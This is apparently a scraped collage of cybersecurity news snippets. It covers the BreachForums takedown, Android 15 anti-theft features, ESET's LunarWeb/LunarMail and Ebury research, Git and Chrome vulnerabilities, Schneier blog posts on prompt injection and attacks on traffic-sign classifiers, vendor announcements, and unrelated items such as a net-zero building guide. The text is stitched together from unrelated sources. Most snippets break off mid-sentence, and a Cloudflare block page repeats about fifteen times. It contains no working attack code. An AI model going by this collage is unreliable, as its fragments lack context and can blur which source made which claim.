"The BreachForums website has been taken down by the FBI and DOJ with assistance from international partners."

If you have information to report about cyber criminal activity on BreachForums, please contact us: t.me/fbi_breachforums [email protected] breachforums.ic3.gov."

BreachForums emerged in March 2022 following the law enforcement dismantling of RaidForums and the arrest of its owner "Omnipotent."

Google is unveiling a set of new features in Android 15 to prevent malicious apps installed on the device from capturing sensitive data.

"This is helpful for apps that want to hide sensitive information from other apps and protect users from scams."

"We recently began piloting enhanced fraud protection with Google Play Protect, in countries where internet-sideloaded malicious app installs are prevalent.

"If suspicious behavior is discovered, Google Play Protect can send the app to Google for additional review and then warn users or disable the app if malicious behavior is confirmed."

Live threat detection also builds on a recently added capability that allows for real-time scanning at the c…

Google has announced a slew of privacy and security features in Android, including a suite of advanced protection features to help secure users' devices and data in the event of a theft.

These features aim to help protect data before, during and after a theft attempt, the tech giant said, adding they are expected to be available via an update to Google Play services for devices running Android versions 10 and later.

Another noteworthy addition is an upgrade to factory reset that effectively makes a stolen device useless.

"This renders a stolen device unsellable, reducing incentives for phone theft."

Also coming to Android 10+ devices is an Offline Device Lock that locks the device screen if…

An unnamed European Ministry of Foreign Affairs (MFA) and its three diplomatic missions in the Middle East were targeted by two previously undocumented backdoors tracked as LunarWeb and LunarMail.

Earlier this year, the cyber espionage group was discovered attacking Polish organizations to distribute a backdoor named TinyTurla-NG (TTNG).

LunarWeb is equipped to gather system information and parse commands inside JPG and GIF image files sent from the C&C server, following which the results are exfiltrated back in a compressed and encrypted format.

The second implant, LunarMail, supports similar capabilities, but notably piggybacks on Outlook and uses email for communication with its C&C serv…

CVSS evaluates vulnerabilities based on various criteria, utilizing metrics with predefined options for each metric.

, enabling more accurate detection and response to potential threats by correlating network events with known vulnerabilities.

More Than the Known VulnerabilitiesWhile EDR excels at blocking known vulnerabilities, NDR extends its capabilities to zero-day attacks and unknown threat vectors.

CVSS acts as a crucial element in effective risk management, offering a standardized framework for evaluating vulnerabilities based on their severity.

Leveraging CVSS scores, NDR offers granular risk assessment and prioritizes alerts based on vulnerability severity, ensuring swift responses…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Key points of the blogpost: ESET Research discovered two previously unknown backdoors – LunarWeb and LunarMail – used in the compromise of a European MFA and its diplomatic missions.

Additionally, evidence of spearphishing includes a Word document installing a LunarMail backdoor via a malicious macro.

This document has unusual components: 32- and 64-bit versions of a Stage 1 loader, and a Stage 2 blob containing the LunarMail backdoor.

The security checks include a limit of initial contact attempts with the C&C server, assessing the backdoor’s lifespan, and checking C&C server accessibility.

Information collectionOn first run, the LunarMail backdoor collects the following information:enviro…

Ebury, Ebury everywhereThis paper reveals new methods used to propagate Ebury to new servers.

Ebury operators leverage existing Ebury-compromised servers in the same network segment as their target to perform ARP spoofing.

Combined, about 400,000 servers have been compromised by Ebury since 2009, and more than 100,000 were still compromised as of late 2023.

Multiple malware families deployed on Ebury-infested servers and the impact for potential victimsHiding deeperThe Ebury malware family itself has also been updated.

The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more details about each of Ebury’s aspects, in…

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2023 and Q1 2024ESET APT Activity Report Q4 2023–Q1 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from October 2023 until the end of March 2024.

In this report, we also introduce a new China-aligned APT group, CeranaKeeper, distinguished by unique traits yet possibly sharing a digital quartermaster with the Mustang Panda group.

Malicious activities described in ESET APT Activity Report Q4 2023–Q1 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has …

“When I talk about climate change with people, I spend hardly any time on the science of climate change,” says Katharine Hayhoe, a leading climate science communicator and a speaker at Starmus Earth: The Future of Our Home Planet.

Climate Scientist – Distinguished Professor at Texas Tech University – Chief Scientist for The Nature Conservancy Katharine Hayhoe is an atmospheric scientist who studies how climate change impacts us and how we can effectively respond.

On that note, another interesting remark you've made is, "How do you talk to someone who doesn’t believe in climate change?

So, how do you get someone who says that we can’t possibly know that humans are causing climate change or b…

We’re thrilled to announce that WeLiveSecurity has been named a finalist in the Corporates – Best Cybersecurity Vendor Blog category of the European Security Blogger Awards 2024We’re thrilled to announce that WeLiveSecurity has been named a finalist in the Corporates – Best Cybersecurity Vendor Blog category of the European Security Blogger Awards 2024.

We’re grateful for this nomination, which we see as a reflection of the talents and efforts of ESET’s security researchers and content creators.

This is actually where you, our readers, can help – your show of support could make all the difference in helping us win once again!

If you enjoy what you read, see and hear on WeLiveSecurity, pleas…

More than 40,000 security experts descended on San Francisco this week.

Let's now look back on some of the event's highlights – including the CISA-led 'Secure by Design' pledge also signed by ESET.

More than 40,000 security professionals descended on San Francisco this week to attend one of the industry's key events Predictably, AI was the main talk of the town, but there was another hot topic – software security.

Importantly, the event saw the signing of the Secure by Design pledge by the world's biggest software manufacturers.

Watch Tony's video to find out and learn more about the pledge from the launch event and on CISA's website.

This hearkens back to the heady days where security software marketers swamped the floor with AI and claimed it would solve every security problem – and maybe world hunger.

We never stopped doing the hard work.

We’ve been using AI for decades in one form or another, but simply viewed it as another tool in the toolbox – which is what it is.

AI contains a form of understanding, but not really the way you think of it.

But security will still be hard – really hard – and both sides just stepped up, not eliminated, the game.

As Starmus Earth draws near, we caught up with Dr. Garik Israelian to celebrate the fusion of science and creativity and venture where imagination flourishes and groundbreaking ideas take flightSome time ago, we briefly spoke to Dr. Garik Israelian, one of the founders of the Starmus Festival, to hear his views mainly about the festival's mission.

The event is now just days away and we caught up with Dr. Israelian, an astrophysicist and the visionary force behind the festival, again to celebrate the fusion of science and creativity and the boundless possibilities born from this convergence.

Join host Alžbeta Kovaľová as she speaks to Dr. Israelian about:the festival's primary missionthe con…

These gadgets are designed to help identify and prevent security woes, but what if they fall into the wrong hands?

There are a bunch of popular geeky gadgets with endearing names that provide valuable functionality for hobbyist hackers and security professionals alike.

Originally designed to aid penetration testers and other security professionals in automating their tasks, these plug-and-play gadgets can wreak havoc in mere minutes.

All scripting functionalities available in the Rubber Ducky can also be found in the Bash Bunny.

That said, the Bash Bunny still ups the ante further.

The facility had to take all its computers and systems offline and reschedule non-emergency procedures and appointments in the aftermath of the attack.

The gang has also released what It says are samples of data stolen during the attack.

More broadly, what are the motivations behind paying, or not paying, ransom fees?

Indeed, should you pay up, and how does cyber-insurance come into play?

More on this topic:Connect with us on Facebook, Twitter, LinkedIn and Instagram.

Imagine an even worse outcome: you are approached by someone or see an advert offering cryptocurrency recovery services.

Unfortunately, this type of “recovery fraud” is increasingly common, and even the FBI has issued a Public Service Announcement (PSA) about it last year.

How do crypto recovery scams work?

Sample messages peddling cryptocurrency recovery services in discussion forums (click to enlarge)Some crypto recovery scammers are advertising their wares via low-cost online press release distribution services.

Avoiding crypto theftGranted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place.

Considering the potential influences of these responsibilities on business functions, it’s prudent to open a conversation about offloading certain tasks through an MDR service.

Additionally, the service also includes all modules of ESET PROTECT Elite, the ESET MDR service, and ESET Premium Support Essential.

An MDR service offers a comprehensive solution in a unified experience.

As such, these days, it is not only businesses themselves that acknowledge the need for robust cybersecurity solutions.

For enterprises looking to elevate their security posture, ESET PROTECT MDR Ultimate offers proactive prevention with superior protection and, through a tailor-fit security service, enables granula…

David J. Eicher (born August 7, 1961) is an American editor, writer, and popularizer of astronomy and space.

This is of course a very critical time to always remember the question of the future of our home planet.

We take Earth as a habitat and our life on Earth for granted.

Some argue that it doesn't make sense to explore the depths of space when we need to address serious problems here on Earth.

What do you think are the greatest benefits of what we have already learned about the universe and space?

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked victims into handing over their sensitive detailsOne of the world’s largest phishing-as-a-service (Phaas) platforms known as LabHost has been disrupted in a global law enforcement operation, Europol has announced.

Some 10,000 people across the world used the service, with the monthly fee averaging $249.

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked users into handing over their sensitive details.

Learn more about the sting in the video – and make sure you know how to avoid falling victim to a phishing attack.

In other cybercrime news, US…

Dear Naked Security readers,Firstly, thank you for your interest, your time, and your contributions to the Naked Security community.

We have recently added the extensive catalog of Naked Security articles to the Sophos News blog platform, enabling us to provide all Sophos security research, insights, and intelligence in a single location.

We are redirecting articles from Naked Security to Sophos News and you can continue to access the Naked Security article library whenever you need it.

You can find their articles in the Security Operations, Threat Research and AI Research sections of this blog.

Whether you’re a threat hunter, security administrator, IT/security generalist, home user or mor…

Mom’s Meals issues “Notice of Data Event”: What to know and what to do

S3 Ep149: How many cryptographers does it take to change a light bulb?

Using WinRAR?

Be sure to patch against these code execution bugs…

Have you listened to our podcast?

“Snakes in airplane mode” – what if your phone says it’s offline but isn’t?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep147: What if you type in your password during a meeting?

Have you listened to our podcast?

The US Justice Department had unsealed charges against a US woman and an Ukranian man who, along with three unidentified foreign nationals, have allegedly helped North Korean IT workers work remotely for US companies under assumed US identities and thus evade sanctions.

Some of these companies were purposely targeted by a group of DPRK IT workers, who maintained postings for companies at which they wanted to insert IT workers,” the DOJ says.

According to the State Department, this scheme went on from October 2020 to 2023 and generated at least $6.8 million for the DPRK.

How to identify North Korean IT workersUS authorities have been warning about North Korean hackers posing as IT freelancer…

The worst time to find out your company doesn’t have adequate access controls is when everything is on fire.

That’s why having adequate identity access management (IAM) policies in place – which include both authorization (AuthZ) and authentication (AuthN) – is especially critical when it comes to your incident management tooling.

It’s the role of security teams to work together with platform teams to ensure that the appropriate access controls are in place.

You don’t want to be in a situation where access is granted off the cuff or where someone should already have access and doesn’t.

Considerations for incident managementWhatever incident management solution you choose, you need to ensure…

Kroll expands its document review capabilities with DataminerAI to immediately pinpoint where sensitive data is located, providing faster, more efficient and affordable data mining.

The technology optimizes incident response investigations and is available to all insurance carriers, law firms, and incident response providers seeking more efficient document review.

It leverages large language models (LLM) to rapidly analyze data sets of all sizes to find sensitive data and categorize it for immediate analysis, extraction and review.

DataminerAI provides customized workflows based on its findings and delivers solutions which reduce the need for manual review.

This saves time and money typical…

GitLab announced new innovations across the platform to streamline how organizations build, test, secure, and deploy software.

Introducing GitLab Duo EnterpriseGitLab Duo Enterprise, a new end-to-end AI add-on, combines the developer-focused AI capabilities of GitLab Duo Pro—organizational privacy controls, code suggestions, and chat—with enterprise-focused AI capabilities to help organizations proactively detect and fix security vulnerabilities, summarize issue discussions and merge requests, resolve CI/CD bottlenecks and failures, and enhance team collaboration.

Organizations can customize GitLab Duo with context from their software projects for model personalization.

Additionally, GitLab…

A growing IT skills shortage is impacting organizations in all industries and across all regions, according to IDC.

And the situation is not expected to get any better.

And a variety of cloud skills, including architecture, data management and storage, and software development, are among the ten most needed skills identified by survey respondents.

This situation is further compounded by the need for additional, non-technical skills, such as digital business skills, human skills, and leadership skills.

“Getting the right people with the right skills into the right roles has never been so difficult,” says Gina Smith, PhD, research director for IDC’s IT Skills for Digital Business practice.

In this Help Net Security video, Jeremy Nichols, Director, Global Threat Intelligence Center at NTT Security Holdings, discusses a recent surge in ransomware incidents.

After a down year in 2022, ransomware and extortion incidents increased in 2023.

More than 5,000 ransomware victims were detected or posted across multiple social channels up from approximately 3,000 in 2022, according to the 2024 Global Threat Intelligence Report by NTT Security Holdings.

Other key findings:

The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero.

IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets.

Over 7% of the ICS assets sampled are exposed to the public internet.

These assets include programmable logic controllers, power meters, and protocol gateways, all of which play an important role in critical infrastructure.

Server Message Block (SMB) v1 is still enabled on 13% of Windows systems.

Here’s a look at the most interesting products from the past week, featuring releases from Calix, FireMon, ManageEngine, and OWASP Foundation.

Updates include new security alerts and heightened cybersecurity reporting across primary, staff, and point of sale (POS) managed networks.

BLint: Open-source tool to check the security properties of your executablesBLint is a Binary Linter designed to evaluate your executables’ security properties and capabilities, utilizing LIEF for its operations.

OWASP dep-scan: Open-source security and risk audit toolOWASP dep-scan is an open-source security and risk assessment tool that leverages information on vulnerabilities, advisories, and licensing restric…

New versions of Git are out, with fixes for five vulnerabilities, the most critical (CVE-2024-32002) of which can be used by attackers to remotely execute code during a “clone” operation.

It can be installed on machines running Windows, macOS, Linux, and various *BSD distributions.

Visual Studio, Microsoft’s integrated development environment, has Git tooling (MinGit) built directly into it, and other IDEs rely on it.

CVE-2024-32002 and other fixed vulnerabilitiesCVE-2024-32002 is a critical vulnerability that allows specially crafted Git repositories with submodules to trick Git into writing files into a .git/ directory instead of the submodule’s worktree.

If you cannot update immediately,…

For the third time in the last seven days, Google has fixed a Chrome zero-day vulnerability (CVE-2024-4947) for which an exploit exists in the wild.

Google does not usually share details fixed vulnerabilities, and even refrains from saying whether the existing exploit for them is being leveraged or not.

Still, Berdnikov and Larin being researchers with Kaspersky’s Global Research & Analysis Team, chances are good that they spotted the vulnerability being actively exploited.

CVE-2024-4947 has been fixed in Chrome 125.0.6422.60/.61 (for Windows and Mac) and 125.0.6422.60 (for Linux), along with three additional vulnerabilities.

Depending on the privileges associated with the user an attacker …

Palo Alto Networks and IBM announced a broad-reaching partnership to deliver AI-powered security outcomes for customers.

“Strategic partnerships like the one we’re announcing today with Palo Alto Networks bring with them significant benefits across the industry.

We’ll deliver these capabilities with Palo Alto Networks, and accelerate our security investments and innovation in areas like data security and identity and access management.

Together, Palo Alto Networks and IBM will accelerate consultant training, enabling more than 1,000 IBM experts to provide optimal migration, deployment, and adoption services across Palo Alto Networks platforms.

watsonx will help Palo Alto Networks proactivel…

Even if a major open-source AI project hasn’t already been compromised, it’s only a matter of time until it is.

So, let’s explore why open-source AI security is lacking and what security professionals can do to improve it.

Recent research indicates an inverse relationship between the security posture of open-source AI software tools and their popularity.

Put simply, the more widely adopted an open-source AI tool or model, the greater the security vulnerabilities it may possess.

Furthermore, the prevalence of open-source AI models trained on potentially illegal or unethical data poses significant legal and regulatory risks for users.

OWASP dep-scan is an open-source security and risk assessment tool that leverages information on vulnerabilities, advisories, and licensing restrictions for project dependencies.

It supports local repositories and container images as input sources, making it suitable for integration with ASPM/VM platforms and use in CI environments.

OWASP dep-scan featuresCaroline Russell, Staff Security Engineer at AppThreat, outlines the most important features:Depscan utilizes cdxgen to produce Software Bill-of-Materials (SBOMs), which allows us to support many different languages and source code configurationsIt offers result exports into customizable Jinja reports as well as JSON documents in a couple …

It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation.

The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years.

In many cases, Ebury operators could gain full access to large servers of ISPs and well-known hosting providers.

There is no geographical boundary to Ebury; there are servers compromised with Ebury in almost all countries in the world.

Whenever a hosting provider was compromised, it led to a vast number of compromised servers in the same data centers.

By eliminating intrusive ads, trackers, and cookie notifications, CleanWeb ensures a smoother, faster, and more enjoyable browsing experience that no longer comes at the cost of personal privacy.

It comes with a VPN subscription at no extra cost and can be accessed via a browser extension or the app.

Besides blocking browser ads and banners, the ad blocker can block video ads.

It’s worth mentioning that all four functionalities are available only via the Surfshark browser extension and work only on a browser level.

That’s where CleanWeb steps in, shielding you from ads, cookie pop-ups, and even malware & data breaches.

Currently, as the founder of my cybersecurity startup, TisOva, I am deeply invested in our mission to protect students from online scams.

Beyond my role as a founder, I am deeply committed to advancing cybersecurity through mentorship and advocacy.

Don’t hesitate to ask for help or seek out mentorship opportunities when needed.

One of the prevailing misconceptions in cybersecurity is the belief that older people are more susceptible to online scams.

Secondly, I wish I had known earlier in my cybersecurity journey that not every aspect of cybersecurity is a perfect fit for me.

By leveraging SmartHub data center’s state-of-the-art infrastructure and strategic location, Cato reaffirms its commitment to providing businesses with cutting-edge SASE solutions that empower their growth and global presence.

“Our partnership with e& provides organisations with unparalleled connectivity and a seamless network security stack, setting a new standard in flexibility and agility.

Organisations today require the efficiency and effectiveness of a cloud-native platform, delivering a comprehensive network and security infrastructure within minutes and hours.

The Cato SASE Cloud Platform offers unmatched control and visibility, allowing a seamless connection from any edge to any ser…

Over the past year, a significant portion of global organisations (54%) experienced software supply chain attacks, with many struggling to adapt to the escalating risk environment.

These findings stem from ‘The State of Software Supply Chain Security Risk’ report, released today by Synopsys in collaboration with the Ponemon Institute.

Moreover, only 38% consider the current resources allocated to supply chain security adequate.

“Attackers are getting more sophisticated and thus finding more weaknesses that allow them to explore a supply chain where they can steal sensitive data, plant malware, and control systems.

To learn more, download a copy of “The State of Software Supply Chain Securit…

Advanced Cyber Defence Systems (ACDS) has today joined the US Cybersecurity & Infrastructure Security Agency’s (CISA) and UK National Cyber Security Centre’s (NCSC) Secure by Design pledge, becoming one of the first 100 companies, alongside AWS, Microsoft, Google, Cisco, and IBM, to commit to enhancing product security within a year.

Developing more secure software from the outset aims to thwart these and other threats, from nation state actors as well as criminal groups.

This may involve taking action on all products or starting with a selected set and publishing a roadmap for others.

Elliott Wilkes, CTO at Advanced Cyber Defence Systems, says: “For ACDS, signing the Secure by Design pledg…

For far too long cyber security was seen as a man’s sport.

Cyber security is all about problem-solving.

Instead, they are bolstering their security teams with problem solvers, multi-taskers, born-leaders, each from varying backgrounds, not just previous roles in cyber.

They are also recognising that security teams need to be diverse to achieve cyber resilience.

To tackle today’s evolving cyber threats, we need the perspectives of everyone in society, not just a subset.

The UK’s public sector, unfortunately, stands first in line to receive many of these attacks.

Bracing for escalating cybersecurity threatsThere is no question that the UK’s public sector organisations are facing an increase in security threats.

And, importantly, what is the best way to generate best practice throughout the public sector to mitigate risk?

The public sector is routinely charged three times as much as the private sector for equivalent IT deployments.

ConclusionThis entire broken IT system is frustrating for the public and public sector organisations – additionally, it is enormously frustrating for IT vendors with the expertise to deliver lower cost, secure systems.

My role as a Co-Founder and Director of CyberWomen Groups C.I.C.

Further, I am passionate about enhancing the cybersecurity experience for future cyber professionals coming through university.

Concurrently, as a graduate cybersecurity engineer at Leonardo, I aim to enhance my skill set and explore the different areas of cyber.

To make a change and to empower women studying cybersecurity, I, as part of a team, co-founded the initiative CyberWomen@Warwick.

Alongside this, I am a graduate cybersecurity engineer at Leonardo, where I continue to develop my skills and contribute meaningfully to the ever-evolving landscape of cybersecurity.

In today’s business landscape, diverse leadership is essential for driving innovation, improving decision-making, and maintaining a competitive advantage.

This has caused many organisations within the industry to have all-male leadership, which can in turn create a culture of bias.

Whilst cybersecurity is still male-dominated, we’re starting to see positive changes regarding female representation in leadership positions – with 28% of women currently holding C-suite positions globally.

The tangible benefits of diverse leadershipDue to the increased need for innovation and creativity in the cybersecurity industry, it’s even more significant to establish a progressive culture.

STEM businesses …

The findings from Secops Software, an Outpost24 company, analysed 651 million compromised passwords which highlighted a list of 120,000 commonly used password for new team members.

Other common terms found were “guest”, “starter”, and “logon” and highlights a serious issue with these phrases being used as security credentials.

The need for stronger passwords being used is vital otherwise hackers can crack weak passwords in a matter of minutes.

These passwords are usually generated by the IT team, and in theory, should be as strong as any other password.

Unfortunately, many organizations do not follow the best practices for password security, such as using long and random passphrases.

It’s a narrative that regularly gets repeated as a part of the conversation about diversity in tech.

But, while small steps have been taken to balance the scales, women and non-binary individuals are still vastly outnumbered in these industries.

Widening the talent poolTo broaden their talent pool, businesses within the tech industry should be identifying new recruits through more alternative channels.

Discovering this untapped talent – and keeping hold of it – is exactly what the tech sector needs.

Personally, I’m passionate about encouraging more women and non-binary individuals to get into IT and cybersecurity – and to remain there throughout their careers.

How did you get into the cybersecurity industry?

This ethos would later lead me to found Fortify Institute, with a mission to make cybersecurity education available to all.

I’m constantly striving to do more in supporting women and increasing diversity in the tech and cybersecurity industry.

What is one piece of advice you would give to girls/women looking to enter the cybersecurity industry?

Don’t hesitate—dive into the cybersecurity industry with enthusiasm.

CFOs, the keepers of the bottom line, are driven by profitability, whereas CIOs are tasked with achieving technology goals to drive operational efficiency, as well as translating the complex language of digital security to the board.

CIOs need tools and technology to keep up, but this requires complete business buy-in.

There is real opportunity for CIOs and CFOs to collaborate closely, aligning technology investments with financial goals, mitigating risks, improving decision-making, and enhancing overall operational efficiency.

However, before they can do this, CIOs need complete visibility of the entire digital infrastructure.

With real time analytics – powered by automation – the CFO’s an…

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, announced that TrustRadius has recognised KnowBe4’s Security Awareness Training and PhishER with 2024 Top Rated Awards.

KnowBe4’s Security Awareness Training won in the Security Awareness Training category and PhishER won in Incident Response, Security Orchestration, Automation and Response and the Phishing Detection and Response categories.

With a TrustRadius Score of 9 out of 10 and over 1033 verified reviews, KnowBe4’s Security Awareness Training is recognized by their customer reviews as a top player in the Security Awareness Training software category for the fifth consecutive time…

This guide will outline step by step what you need to know about obtaining and maintaining your own net-zero building certification.

Analyze Your Building’s Energy PerformanceTo get a certification for net-zero building, it is important that you evaluate how your building uses energy at present.

Design a Strategy for Energy EfficiencyTo create an effective energy efficiency strategy for your net-zero building, concentrate on four main areas:1.

Renew Certification – Most net-zero building certifications require periodic renewal, typically every few years.

Leverage Your Net-Zero Building CertificationExhibit your commitment to sustainability in promotional activities.

According to the Department for Science, Innovation and Technology (DSIT), only 17% of the UK cyber sector workforce is female, and this is down from 22% in 2022.

As we know, the cyber sector is a male-dominated space, and therefore women aren’t necessarily presented with the same opportunities.

For instance, they might shy away from applying to a cybersecurity role unless they match every single piece of criteria.

Is there anything that can be used to incentivise women to work in the cyber sector?

Prominent female role models and leaders are crucial when it comes to making cyber more attractive for women.

ISO Survey 2022: ISO 27001 certificates (ISMS) from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001ISO опубликовала свежую стаистику по выданным сертификатам. Я же обновил свою презентацию по сертификатам ISO 27001 (ISMS).Всего в 2022 году было зарегистрировано 71 549 сертификатов ISO 27001. Это на 22% больше, чем в 2021 году.ТОП 10 стран по количеству сертификатов:1. China - 263012. Japan - 69873. United Kingdom of Great Britain and Northern Ireland - 60844. India - 29695. Italy - 24246. United States of America - 19807. Netherlands - 17418. Germany - 15829. Spain - 156110. Israel - 1467Для сравнения, в РФ в 2022 году было зарегистрировано (осталось) только 30 сертификатов, а в 2021 было 95…

Выложил на Udemy свой первый курс по подготовке к сертификационному аудиту СУИБ по ISO 27001, "ISO 27001:2022. How to prepare for a certification audit"На нем я разбираю задачи, которые надо сделать До. Во время и После сертификационного аудита. Курс на английском языке.

Cybersecurity Frameworks for DMZCON23 230905.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

My 15 Years of Experience in Using Mind Maps for Business and Personal Purposes from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

From NIST CSF 1.1 to 2.0.pdf from Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001

Всем привет. Пропал, каюсь, работы слишком много :(А пока принес вам 40% скидку на все курсы и сертификации от Linux Foundation. Скидка действует только сегодня.Если кто давно планировал сдать что-то серьезное по k8s, Linux или из DevOps — самое время. Например Certified Kubernetes Administrator (CKA) и Certified Kubernetes Security Specialist (CKS) бандлом стоит $435 вместо $725.Экзамен можно сдать в течении года после покупки> https://training.linuxfoundation.org/end-of-summer-2023/

Microsoft is working on a promising-looking protocol to lock down DNS.

ZTDNS aims to solve this decades-old problem by integrating the Windows DNS engine with the Windows Filtering Platform—the core component of the Windows Firewall—directly into client devices.

A separate allow list will contain IP address subnets that clients need to run authorized software.

Networking security expert Royce Williams (no relation to Jake Williams) called this a “sort of a bidirectional API for the firewall layer, so you can both trigger firewall actions (by input *to* the firewall), and trigger external actions based on firewall state (output *from* the firewall).

So instead of having to reinvent the firew…

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m giving a webinar via Zoom on Wednesday, May 22, at 11:00 AM ET.

The topic is “Should the USG Establish a Publicly Funded AI Option?“The list is maintained on this page.

Posted on May 14, 2024 at 12:04 PM • 0 Comments

Google has patched another Chrome zero-day:On Thursday, Google said an anonymous source notified it of the vulnerability.

The vulnerability carries a severity rating of 8.8 out of 10.

In response, Google said, it would be releasing versions 124.0.6367.201/.202 for macOS and Windows and 124.0.6367.201 for Linux in subsequent days.

“Google is aware that an exploit for CVE-2024-4671 exists in the wild,” the company said.

Google didn’t provide any other details about the exploit, such as what platforms were targeted, who was behind the exploit, or what they were using it for.

Signaling System 7—SS7 for short—split up the two and became a phone system standard in the 1980s.

This general problem of mixing data with commands is at the root of many of our computer security vulnerabilities.

As we build AI systems, we are going to have to balance the power that generative AI provides with the risks.

But generative AI comes with a lot of security baggage—in the form of prompt-injection attacks and other security risks.

We need to take a more nuanced view of AI systems, their uses, their own particular risks, and their costs vs. benefits.

Friday Squid Blogging: Squid Mating StrategiesSome squids are “consorts,” others are “sneakers.” The species is healthiest when individuals have different strategies randomly.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on May 10, 2024 at 5:07 PM • 0 Comments

The result is the camera capturing an image full of lines that don’t quite match each other.

Because it’s full of lines that don’t match, the classifier doesn’t recognize the image as a traffic sign.

This meant an unrecognizable image wasn’t just a single anomaly among many accurate images, but rather a constant unrecognizable image the classifier couldn’t assess, and a serious security concern.

The first was GhostStripe1, which is not targeted and does not require access to the vehicle, we’re told.

GhostStripe2 is targeted and does require access to the vehicle, which could perhaps be covertly done by a hacker while the vehicle is undergoing maintenance.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

This attack has been feasible for over two decades:Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address.

The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user’s V…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

